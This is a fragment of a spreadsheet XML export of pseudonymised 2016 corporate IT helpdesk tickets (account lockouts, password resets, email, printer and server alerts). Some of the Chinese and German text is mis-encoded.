    <s v="_x000d__x000a__x000d__x000a_received from: fmhlugqk.dpraethi@gmail.com_x000d__x000a__x000d__x000a_hallo liebe kollegen/kolleginnen,_x000d__x000a__x000d__x000a_ich kann skype nicht starten. kommt immer diese fehlermeldung:_x000d__x000a_[cid:image001.png@01d22469.6086f8f0]_x000d__x000a__x000d__x000a_Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fmhlugqk dpraethi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="accound locked in ad"/>
    <s v="accound locked in ad"/>
    <s v="iczltbdf cmvjhyxl"/>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ypcudwsf phvatzje"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales record"/>
    <s v="_x000a__x000a_received from: rdfjsawg.zpmxgdcw@gmail.com_x000a__x000a_from: amy li_x000a_sent: tuesday, october 11, 2016 8:08 pm_x000a_to: pradyhtueep yyufs &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;_x000a_cc: mthyn xiyhtu&lt;blmvcuya.heklonfc@gmail.com&gt;; jtyhnifer luntu&lt;urfdkvei.bfiulzto@gmail.com&gt;; ayhtrvin yzhao &lt;oqmiabtv.spridlbm@gmail.com&gt;; crysyhtal xithya &lt;smktofel.etsoirbw@gmail.com&gt;; mathgie ztyhng &lt;ryajizsq.roezpsav@gmail.com&gt;; alvrhn twhyang &lt;evlburfd.xbusnyam@gmail.com&gt;; xamtgvnw usdekfzq &lt;xamtgvnw.usdekfzq@gmail.com&gt;_x000a_subject: re: sales record_x000a__x000a_prathryep,_x000a__x000a_we want to understand why the cost is high for mm7201504 in 5319, plant_283, we select one example._x000a_mm 7201504_x000a_this mm is manufactured in plant_304, ship to plant_283._x000a_sales order 35729979/30_x000a_relevant dn 9169339940 and  9169306146_x000a_intercompany billing 0159162480_x000a_billing in plant_283 0159163814_x000a_shipment cost in plant_304 rmb892.17( we didn't understand why the cost in plant_304 is so high),it is delivery on sep 25 in plant_304_x000a_sales cost in plant_283 is rmb892.12 (this is from margin report in 5319 plant_283, why it is so high?)_x000a_std cost in plant_304 is rmb624,15_x000a_cost in plant_304 is rmb772.19 based on lot size 80( the qty. is same as sales order)_x000a__x000a_"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="43"/>
  </r>
  <r>
    <s v="5323 - credit limit revision for company tooling and company distributors"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rdfjsawg.zpmxgdcw@gmail.com_x000d__x000a__x000d__x000a_from: yhmwxsqj ugnthxky_x000d__x000a_sent: wednesday, october 12, 2016 11:37 am_x000d__x000a_to: pradyhtueep yyufs &lt;rdfjsawg.zpmxgdcw@gmail.com&gt;_x000d__x000a_subject: fw: credit limit revision_x000d__x000a__x000d__x000a_pradtheyp,_x000d__x000a__x000d__x000a_please look into the revision request of company tooling and company credit limit of distributors._x000d__x000a__x000d__x000a_this is one of the ia point and schedule closure was 30th sep'16._x000d__x000a__x000d__x000a_need your support to complete this activity so that we can respond to ia team for closure of this point._x000d__x000a__x000d__x000a_best "/>
    <s v="yhmwxsqj ugnthxky"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account is getting locked daily"/>
    <s v="account is getting locked daily"/>
    <s v="wqybuifo qlwfajcb"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unlock my erp account"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jqpvitdw.vitsrceq@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_could you please help to unlock my erp SID_34 account_x000d__x000a_my user id is lilp_x000d__x000a__x000d__x000a_"/>
    <s v="jqpvitdw vitsrceq"/>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zdgxtfqs tibmhxcs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool / kpm project numbers not in the right order!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ucphibmr.dfvkbtsj@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_about the engineering tool:_x000d__x000a_the kpm project numbers are numerirtcal not in the right order anymore!_x000d__x000a__x000d__x000a_"/>
    <s v="ucphibmr dfvkbtsj"/>
    <x v="25"/>
  </r>
  <r>
    <s v="lan connection in training room 3 not workig - also need mini-dp to vga adapter"/>
    <s v="lan connection in training room 3 not workig - also need mini-dp to vga adapter"/>
    <s v="jemfbnyk uicenhfp"/>
    <x v="28"/>
  </r>
  <r>
    <s v="HostName_97: disk space on e:\ label:dat1-HostName_97 is 99% consumed available space is 4.6gb out of 625gb"/>
    <s v="HostName_97: disk space on e:\ label:dat1-HostName_97 is 99% consumed available space is 4.6gb out of 625gb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="solid works issue: when trying to give print , solid work crashes."/>
    <s v="solid works issue: when trying to give print , solid work crashes._x000d__x000a__x000d__x000a_===see attachment===_x000d__x000a_-ph: 411_x000d__x000a_-ph:0774430915_x000d__x000a_-"/>
    <s v="hratikvm sbwefglc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="outlook configuration for new mobile handset"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ckswypji.vrucgqna@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_  request your support to configure settings for outlook mails on my new motorola- moto g4 plus handset._x000d__x000a__x000d__x000a_"/>
    <s v="ckswypji vrucgqna"/>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wkzrenmj vsyctbzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login into ethics"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_i am not able to login in ethics portal to complete the course_x000d__x000a_kindly do needful._x000d__x000a__x000d__x000a_error screen shot attached for reference ._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d22471.89b858b0]_x000d__x000a__x000d__x000a_with best "/>
    <s v="kxmidsga zokivdfa"/>
    <x v="23"/>
  </r>
  <r>
    <s v="reset passwords for eglavnhx uprodleq using password_management_tool password reset."/>
    <s v="the"/>
    <s v="eglavnhx uprodleq"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job bwhrertran failed in job_scheduler at: 10/12/2016 00:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrertran failed in job_scheduler at: 10/12/2016 00:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="impacts awards login issue"/>
    <s v="impacts awards login issue"/>
    <s v="ouqzfajm pioneqcg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mm:pur_req_ko assign for user: yeyhtung kimthy (vvkuimtyu) SID_34 system"/>
    <s v="mm:pur_req_ko assign for user: yeyhtung kimthy (vvkuimtyu) SID_34 system._x000d__x000a__x000d__x000a_from: alkuozfr bhqgdoiu _x000d__x000a_sent: tuesday, october 11, 2016 4:51 pm_x000d__x000a_to: sudghhahjkkarreddy rangini; dbwkxalj cnhgysju_x000d__x000a_cc: suhtnhdyio psfshytd; seocompanyxv syxewkji; -erp-purchasing; k-hr-global datateam_x000d__x000a_subject: re: ticket_no1543692: erp - additional access_x000d__x000a__x000d__x000a_this role has been requested and i have approved it numerous times in the past._x000d__x000a_the role is approved._x000d__x000a__x000d__x000a_this will still not resolve the issue at hand. that issue will deal with the users attributes and possibly with hr org data._x000d__x000a_please loop in the erp:purchasing team and the global hr data team to get this completed._x000d__x000a_hell_x000d__x000a_doug englehart_x000d__x000a_manager global sourcing systems_x000d__x000a_alkuozfr.bhqgdoiu@gmail.com_x000d__x000a_t +1 724 539 5257_x000d__x000a_m +1 724 331 7610_x000d__x000a_f +1 724 539 5744_x000d__x000a__x000d__x000a_company inc. | 1600 technology way | usa, pa 15650 | www.company.com_x000d__x000a__x000d__x000a_from: sudghhahjkkarreddy rangini _x000d__x000a_sent: wednesday, september 21, 2016 7:17 am_x000d__x000a_to: alkuozfr bhqgdoiu; dbwkxalj cnhgysju_x000d__x000a_cc: suhtnhdyio psfshytd; seocompanyxv syxewkji_x000d__x000a_subject: re: ticket_no1543692: erp - additional access_x000d__x000a__x000d__x000a_hi douglas,_x000d__x000a_ _x000d__x000a_below purchase role not assigned to users. _x000d__x000a__x000d__x000a_is it may the issue? can you please check and if needs to be assign below role to user: seocompanyxv syxewkji (vvkuimtyu) SID_34 system, please provide your approval for the same._x000d__x000a_ _x000d__x000a_role: mm:pur_req_ko_x000d__x000a_ _x000d__x000a__x000d__x000a_"/>
    <s v="kmnsvzuq euyvihzc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="user needs help to create delivery."/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to check , "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/11/2016 22:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/11/2016 22:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="error login on to the mii system."/>
    <s v="error login on to the mii system._x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-unlocked and reset the erp id to&quot;daypay3&quot;._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="ikxrlnvu cujyriwh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="è´¦æˆ·è¢«é”å®š"/>
    <s v="ç”¨æˆ·å¿˜è®°å¯†ç ï¼Œå¯¼è‡´è´¦æˆ·é”å®š"/>
    <s v="neovalui kabpfvic"/>
    <x v="47"/>
  </r>
  <r>
    <s v="è¾“å…¥ç”¨æˆ·åå’Œå¯†ç åŽæ˜¾ç¤ºå‡ºé”™"/>
    <s v="ç™»å½•æ—¶è¾“å…¥ç”¨æˆ·åå’Œå¯†ç åŽï¼Œæ˜¾ç¤ºç”¨æˆ·åå’Œå¯†ç é”™è¯¯"/>
    <s v="ofiglcaq hvcqtzel"/>
    <x v="47"/>
  </r>
  <r>
    <s v="HostName_1002 : volume: j:\ label:dat5-HostName_1002 8e944afe on server: HostName_1002 is over 85% space consumed. space available: 1.5"/>
    <s v="HostName_1002 : volume: j:\ label:dat5-HostName_1002 8e944afe on server: HostName_1002 is over 85% space consumed. space available: 1.5 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="1"/>
  </r>
  <r>
    <s v="amssm003  : volume: c:\  94ef9088 on server: is over 85% space consumed. space available: 2.5 g"/>
    <s v="amssm003  : volume: c:\  94ef9088 on server: is over 85% space consumed. space available: 2.5 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="è´¦æˆ·è¢«é”å®š"/>
    <s v="ç”¨æˆ·è´¦æˆ·é”å®šï¼Œè¯·æ±‚è§£é”"/>
    <s v="yvscpgax wdfxytzu"/>
    <x v="47"/>
  </r>
  <r>
    <s v="unable to log in to collaboration_platform "/>
    <s v="unable to log in to collaboration_platform "/>
    <s v="advqtkeu uypkfisq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 10/11/2016 19:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 10/11/2016 19:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ticket update on inc1559662 "/>
    <s v="ticket update on inplant_868551"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no power on the laptop"/>
    <s v="no power on the laptop"/>
    <s v="khrflgcj zxojidhe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp logon"/>
    <s v="_x000a__x000a_received from: hwrxutgm.fjlwmson@gmail.com_x000a__x000a_i changed my password through password_management_toolpasswordmanager and when i attempt to logon to erp my password is not recognized._x000a__x000a_mthyike voyyhuek_x000a_senior materials engineer_x000a_hwrxutgm.fjlwmson@gmail.com&lt;mailto:hwrxutgm.fjlwmson@gmail.com&gt;_x000a__x000a_"/>
    <s v="hwrxutgm fjlwmson"/>
    <x v="0"/>
  </r>
  <r>
    <s v="äº§å“ä¸Žä»“åº“å¯¹ä¸ä¸Š"/>
    <s v="äº§å“æ‰€åœ¨ä»“åº“å‡ºé”™ã€‚ st6p  -100/+325   æ‰¹å·16-9-16"/>
    <s v="tvykmlex hcawjigf"/>
    <x v="47"/>
  </r>
  <r>
    <s v="å¼€æœºé»‘å±"/>
    <s v="ç”µè„‘å¯åŠ¨åŽé»‘å±ï¼Œä¸»æœºæ— æŠ¥è­¦"/>
    <s v="ofiglcaq hvcqtzel"/>
    <x v="47"/>
  </r>
  <r>
    <s v="outlooké‡å¤è¦æ±‚è¾“å…¥å¯†ç "/>
    <s v="outlookå¯†ç æ¡†åå¤å¼¹å‡ºï¼Œè¦æ±‚è¾“å…¥å¯†ç ï¼Œä¸èƒ½æŽ¥æ”¶é‚®ä»¶"/>
    <s v="jtplaoui uvsihfpn"/>
    <x v="47"/>
  </r>
  <r>
    <s v="unable to update passwords using password_management_tool link"/>
    <s v="unable to update passwords using password_management_tool link"/>
    <s v="gonflcmq wmptisvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa's file server not responding, appears to have crashed."/>
    <s v="usa's file server not responding, appears to have crashed."/>
    <s v="qedxiryu mdupjolb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ticket update on inplant_868533"/>
    <s v="ticket update on inplant_868533"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot send email to this customer"/>
    <s v="from: rolcgqhx ehndjmlv _x000a_sent: tuesday, october 11, 2016 11:28 am_x000a_to:communication &lt;communication@company.com&gt;_x000a_subject: help_x000a__x000a_please let me know why i cannot send email to this customer_x000a_ _x000a_best "/>
    <s v="rolcgqhx ehndjmlv"/>
    <x v="26"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0448515"/>
    <s v="ticket update on ticket_no0448515"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reset my pass word for s&amp;op."/>
    <s v="please reset my pass word for s&amp;op."/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull"/>
    <s v="provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull_x000a__x000a_hello,_x000a__x000a_could you please provide network access rights to fuydxemo fntmbpla that match tyyhtuler hiyhtull?_x000a__x000a_access like who person name : tyyhtuler hiyhtull [hiyhllt]_x000a_manager name/ user id :  vnjwsadx iltywzjm- [fidleyhtjp]_x000a__x000a__x000a_best "/>
    <s v="snkeuizv gsjndfuk"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to take ethics course"/>
    <s v="unable to take ethics course"/>
    <s v="jgxclrzp jzeantui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="2nd monitor is bright yellow &amp; gtehdnyu once it warms up."/>
    <s v="2nd monitor is bright yellow &amp; gtehdnyu once it warms up."/>
    <s v="wvtsiucg bfpemgol"/>
    <x v="2"/>
  </r>
  <r>
    <s v="discount form issue ; infopath"/>
    <s v="discount form issue ; infopath"/>
    <s v="szakvjwp imacjlzv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prtqi7307 and 7280 malfunction"/>
    <s v="prtqi7307 and 7280 malfunction"/>
    <s v="zovfeyjp xflunkim"/>
    <x v="2"/>
  </r>
  <r>
    <s v="need print to pdf software"/>
    <s v="need adobe professional or any software that has option to print to pdf_x000d__x000a_computer name--lacl7404951"/>
    <s v="rhwsmefo tvphyura"/>
    <x v="2"/>
  </r>
  <r>
    <s v="user was unable to open reporting_tool"/>
    <s v="user was unable to open reporting_tool"/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the finance_app system is down.  i need someone in the db group to verify that the oracle database  is up and running. "/>
    <s v="finance_app system is down.   i need someone in the database admin group to verify that the database hfmp on server HostName_1136 is up and running. "/>
    <s v="ljyfsaox paxockls"/>
    <x v="54"/>
  </r>
  <r>
    <s v="laptop cannont access companysecure or companyguest wifi in corporate center building"/>
    <s v="i recently received a 16gb engineering laptop to use for work. i currently work in the tech. center building where both wired (docked) connection and wifi (company secure) work fine. i have been in two meetings today in the corporate center building where i cannot connect to any secure wifi network. this has been frustrating since i usually require my laptop with internet to some extent in any meeting. please assist. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out "/>
    <s v="account locked out "/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cyber security - phish uacyltoe hxgaycze report october 2016"/>
    <s v="cyber security - phish uacyltoe hxgaycze report october 2016"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="cannot access usa or usa collaboration_platform documents"/>
    <s v="when i try to open documents, i am prompted to enter my email address, then password, and then the process repeats. i did change my password today, but don't know if that has anything to do with it."/>
    <s v="hoqyxkat jbampwtd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i get a mysterious java error on every boot of my laptop."/>
    <s v="i get a mysterious java error on every boot of my laptop."/>
    <s v="qxhdcnmj caflvjrn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="email"/>
    <s v="_x000a__x000a_received from: raifstow.gfeymtql@gmail.com_x000a__x000a_i need to have k-rckfthy grind added to my microsoft email._x000a__x000a_"/>
    <s v="raifstow gfeymtql"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot print on 11x17 paper on new xerox prtqx4602"/>
    <s v="cannot print on 11x17 paper on new xerox prtqx4602"/>
    <s v="reybfnmc jentcopr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset and access to reporting_engineering_tools"/>
    <s v="password reset and access to reporting_engineering_tools"/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting issues"/>
    <s v="during skype meetings, i have been unable to use skype calls.  i get the message that my speaker is not working and it will not connect me to audio.  this happened yesterday for one call and then it worked later in the day.  today i have not been able to join via skype.  my same headset works fine for telephone calls, so i do not believe it is my headset."/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administra"/>
    <s v="from: lhejbwkc xbmyvnqf _x000d__x000a_sent: tuesday, october 11, 2016 5:48 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: dan fw: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000d__x000a_importance: high_x000d__x000a__x000d__x000a_dear all_x000d__x000a__x000d__x000a_please activate my new iphone, it is a company owned device._x000d__x000a__x000d__x000a_"/>
    <s v="lhejbwkc xbmyvnqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="defect scanner/printer &quot;vh42-plant manager/controlling&quot;. "/>
    <s v="from: byclpwmv esafrtbh _x000a_sent: tuesday, october 11, 2016 7:47 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: geoyhtrge wuryhtudack_x000a_subject: trurthyuft wg: ticket fÃ¼r drucker_x000a__x000a_hello help-team,_x000a__x000a_pls enter a ticket regarding defect scanner/printer &quot;vh42-plant manager/controlling&quot;. _x000a_local it is already working on that (with external supplier). _x000a_just to make sure all work is trackedâ€¦_x000a__x000a_thx_x000a_marfhtyio_x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="byclpwmv esafrtbh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0447085"/>
    <s v="ticket update on ticket_no0447085"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="is there cert open for the usa telephone system outage / disruption?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oxlqvika.zrvbahym@gmail.com_x000d__x000a__x000d__x000a_it's been down for long distance most of the day â€¦_x000d__x000a__x000d__x000a_justrgun_x000d__x000a__x000d__x000a_"/>
    <s v="oxlqvika zrvbahym"/>
    <x v="36"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: tuesday, october 11, 2016 6:35 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: rohit request to reset microsoft online services password for wjdatzyv.bhkoldjv@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ wjdatzyv.bhkoldjv@gmail.com _x000a_â€¢ first name: ncoileu _x000a_â€¢ last name: boeyhthm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wjdatzyv bhkoldjv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software password reset"/>
    <s v="from: ftnijxup sbltduco _x000a_sent: tuesday, october 11, 2016 1:20 am_x000a_to: jmxrabzy dpyvjcxr; nwfodmhc exurcwkm_x000a_subject: rakthyesh re: finished: start of s&amp;op process_x000a__x000a_help desk,_x000a_please check johthryu's account in supply_chain_software. _x000a__x000a_"/>
    <s v="jmxrabzy dpyvjcxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="customer  unable to hear user on telephony_software"/>
    <s v="i am signed in to both telephony_software and crm. i am using a soft phone and when the phone rings i select pick up in crm to answer the call and no one can hear me'_x000a__x000a_telephony_software extension number:-154800 _x000a_system name-lfml8517753_x000a_call back number-"/>
    <s v="nibaotpy vmxathog"/>
    <x v="6"/>
  </r>
  <r>
    <s v="monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_992 &amp; HostName_993"/>
    <s v="monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_993_x000d__x000a_monitoring_tool is has detected an event in the windows event log with id:50410 on host: HostName_992"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="phone issue"/>
    <s v="phone issue"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="cydotikj wpvhfijt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue with hr_tool"/>
    <s v="when i try to put in a vacation request in hr_tool, the requests do not show on the calendar.  i need to cancel some dates but they don't show up for me to cancel them.  my supervisor cannot see my requests either"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="7350 : audio issue "/>
    <s v="_x000a_summary:since outlook crashed yesterday the speakers on 2n1 device do not work. last week a bios upgrade was run to get speakers working again"/>
    <s v="wpdxlbhz etvzjmhx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue : crashing and not responding "/>
    <s v="outlook issue : crashing and not responding "/>
    <s v="zxobmreq udikorhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="helped user with crm site and : "/>
    <s v="helped user with crm site and : _x000d__x000a_also helped user with vendor number ."/>
    <s v="flhkxeqd gwidroap"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on : ticket_no0447258"/>
    <s v="ticket update on : ticket_no0447258"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password_management_tool password manager ?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: itjzudor.ybtmorxp@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_where do i find the password_management_tool password manager ?_x000d__x000a__x000d__x000a_"/>
    <s v="itjzudor ybtmorxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: windows account unlock"/>
    <s v="vip 2: windows account unlock"/>
    <s v="tqjsmwvk arqoytbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to reply to emails"/>
    <s v="unable to reply to emails"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is unable to connect"/>
    <s v="_x000a__x000a_received from: gacfhedw.iqustfzh@gmail.com_x000a__x000a_hello team,_x000a__x000a__x000a_my outlook is unable to connect to mailserver, this happened just after i renewed my passwords over password_management_tool password manager upon an email notification. i do not have any problems in connecting emails over office 365 web, or in skype business.._x000a__x000a__x000a_could you please take a look?_x000a__x000a__x000a_user: gokcerthy_x000a__x000a_computer: aisl8111131_x000a__x000a__x000a_"/>
    <s v="gacfhedw iqustfzh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="iÌ‡lt: outlook is unable to connect"/>
    <s v="_x000a__x000a_received from: gacfhedw.iqustfzh@gmail.com_x000a__x000a__________________________________x000a_gÃ¶nderen: gacfhedw iqustfzh_x000a_gÃ¶nderildi: 11 ekim 2016 salÄ± 16:03_x000a_kime: nwfodmhc exurcwkm_x000a_konu: outlook is unable to connect_x000a__x000a__x000a_hello team,_x000a__x000a__x000a_my outlook is unable to connect to mailserver, this happened just after i renewed my passwords over password_management_tool password manager upon an email notification. i do not have any problems in connecting emails over office 365 web, or in skype business.._x000a__x000a__x000a_could you please take a look?_x000a__x000a__x000a_user: gokcerthy_x000a__x000a_computer: aisl8111131_x000a__x000a__x000a_"/>
    <s v="gacfhedw iqustfzh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password_management_tool password manager queries and password reset "/>
    <s v="password_management_tool password manager queries and password reset "/>
    <s v="yctvxumf qnajdofz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please provide ip for our 5 users"/>
    <s v="å‘ä»¶äºº: white, ben &lt;ben.white@hr_tool.com&gt;_x000a_å‘é€æ—¶é—´: 2016å¹´10æœˆ11æ—¥ 9:00:30_x000a_æ”¶ä»¶äºº: eva li; dyhtuiel.hiyhugins@company.com; stefyty parkeyhrt_x000a_æŠ„é€: haiwei.liang@hr_tool.com; patience, rob_x000a_ä¸»é¢˜: re: company intepmov imjukbqhing plan _x000a_ _x000a_hi eva,_x000a_can you work with your local it team to determine your desktop ip address and provide it to dyhtuiel and stefyty._x000a__x000a_hi dyhtuiel, stefyty,_x000a_eva is a miowvyrs qkspyrdm located in the apac office . please check that the routing is in place from her network to connect over the vpn to hr_tool ( 12.161.199.3   to   185.42.190.22 )._x000a__x000a_"/>
    <s v="krnzfoct mnjbuedp"/>
    <x v="55"/>
  </r>
  <r>
    <s v="unable to open up emails"/>
    <s v="unable to open up emails"/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to make outbound calls from usa using siemens hiapth 4000"/>
    <s v="unable to make outbound calls from usa using siemens hiapth 4000"/>
    <s v="pzsvjman podylbmj"/>
    <x v="36"/>
  </r>
  <r>
    <s v="vip 1 sending email on behalf offinance_vip1"/>
    <s v="_x000a__x000a_received from: lpoebzsc.grknswyo@gmail.com_x000a__x000a_hello â€“ i am a delegate for finance_vip1' email.  i am set up to send emails on behalf of finance_vip1, but when the recipient receives the mail, it says lpoebzsc grknswyo on behalf offinance_vip1.   what i want is for it to just say jk's name, like it had been sent from him.  dtheb mulhylen and othybin graceuyt both have their emails set up that way._x000a__x000a_"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="26"/>
  </r>
  <r>
    <s v="outlook freezes"/>
    <s v="outlook freezes."/>
    <s v="techruxg wasrvkuz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="received a message when trying to open a website - &quot;unsupported browser&quot;."/>
    <s v="asking me to download a new browser to continue. "/>
    <s v="hvskpglx bpsfxmon"/>
    <x v="0"/>
  </r>
  <r>
    <s v="johthryu's erp inbox is not updating since 6th october."/>
    <s v="johthryu's erp inbox is not updating since 6th october."/>
    <s v="bzxljkoy rvoiqthl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="getting virus prompt from sep"/>
    <s v="getting virus prompt from sep_x000d__x000a__x000d__x000a_"/>
    <s v="nwzhlktu plktredg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: usa company, mpls router is down since 8:16 am et on 10/11. site is up on vpn circuit."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________8:16 am et on 10/11_____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na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__na____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na___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handscanner an pc evhw8114203 bei r208 funktioniert nach tausch immer noch nicht;"/>
    <s v="handscanner an pc evhw8114203 bei r208 funktioniert nach tausch immer noch nicht bitte prÃ¼fen und bei bedarf nochmals tauschen;"/>
    <s v="ljxzyriq zqxkrcev"/>
    <x v="32"/>
  </r>
  <r>
    <s v="wg: visio software request"/>
    <s v="_x000d__x000a__x000d__x000a_received from: przcxbml.vnjdghui@gmail.com_x000d__x000a__x000d__x000a_hello support team,_x000d__x000a__x000d__x000a_i need visio on my pc._x000d__x000a__x000d__x000a_can you please install it?_x000d__x000a__x000d__x000a_software request approval attached below._x000d__x000a__x000d__x000a_best "/>
    <s v="przcxbml vnjdghui"/>
    <x v="28"/>
  </r>
  <r>
    <s v="setup we78 \ewewx200295 \lxfnwyuv bqmjyprz"/>
    <s v="setup we78 \ewewx200295 \lxfnwyuv bqmjyprz"/>
